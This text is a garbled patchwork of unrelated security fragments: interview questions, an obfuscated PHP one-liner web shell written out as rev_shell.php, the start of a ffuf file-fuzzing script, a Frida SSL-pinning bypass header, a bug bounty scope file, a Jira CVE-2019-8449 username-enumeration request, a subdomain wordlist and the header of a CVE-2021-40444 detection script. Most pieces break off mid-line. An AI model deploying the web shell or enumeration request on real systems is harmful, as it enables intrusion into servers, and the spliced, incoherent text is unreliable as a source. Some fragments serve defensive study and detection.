- What is information security and how is it achieved?
- What are the core principles of information security?
- What is the CIA triangle?
- What is non-repudiation (as it applies to IT security)?
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;
/*
* In terminal:
* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
* This is how the code will be produced; \xa0\xb8\xba\xab will be
* treated as a constant, therefore no " is needed. It is also not a copyable
* string because of the non-ASCII characters
*
* Explanation:
#!/bin/sh
#tomnomnom juicy files https://gist.github.com/tomnomnom/57af04c3422aac8c6f04451a4c1daa51
# ffuf tool https://github.com/ffuf/ffuf
# put the ffuf bin at /usr/local/bin and give the juicy.sh permission to execute with chmod +x juicy.sh and copy to
# /usr/local/bin too.. after that.. execute juicy.sh at any terminal.
# usage bash juicy.sh filename.txt
filename="$1"
while read -r line; do
    name="$line"
console.log("[*] SSL Pinning Bypasses");
console.log(`[*] Your frida version: ${Frida.version}`);
console.log(`[*] Your script runtime: ${Script.runtime}`);
/**
* by incogbyte
* Common functions
* thx apkunpacker, NVISOsecurity, TheDauntless
* Remember that SSL pinning can be custom, and sometimes you need to reverse it using Ghidra, IDA or something like that.
* !!! THIS SCRIPT IS NOT A SILVER BULLET !!
{
  "programs": [
    {
      "name": "spacex",
      "url": "https://bugcrowd.com/spacex",
      "wildcards": [
        "starlink.com",
        "starlinkisp.net"
      ],
      "out_of_scope_domains": [],
CVE-2019-8449
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
https://jira.atlassian.com/browse/JRASERVER-69796
https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
=====================================================================================================================================
" _ _ "
" _ /|| . . ||\ _ "
" ( } \||D ' ' ' C||/ { % "
" | /\__,=_[_] ' . . ' [_]_=,__/\ |"
" |_\_ |----| |----| _/_|"
" | |/ | | | | \| |"
" | /_ | | | | _\ |"
It is all fun and games until someone gets hacked! |
acc
accept
acceptatie
access
accounts
alpha
alt
api
app
apps
Cyber security is an exotic field, and every other person wants to explore this domain and make a career in it, but the problem is they have no idea how to get in, and even if they do, they don't have any idea what type of questions they might face in an interview.
Recently @Miss_Malware asked for everyone's favourite security analyst and DFIR interview questions, which gave me the idea to compile a list of questions that are asked in every interview one way or another. What follows is a list of questions which you may face in an interview.
# simple script to detect CVE-2021-40444 exploits in DOCX using oletools
# v0.01 Philippe Lagadec 2021-09-09
# IMPORTANT NOTE: this script detects the few samples identified so far, by looking for "mhtml:" in remote objects URLs.
# But it is not confirmed yet if this detection is generic enough, for example if "mhtml:" is not mandatory.
# Moreover, for now only Office 2007+ files are supported.
# Detection for other file types (RTF, Office 97-2003, ...) will be implemented later.
import sys, zipfile
from oletools import oleobj, ooxml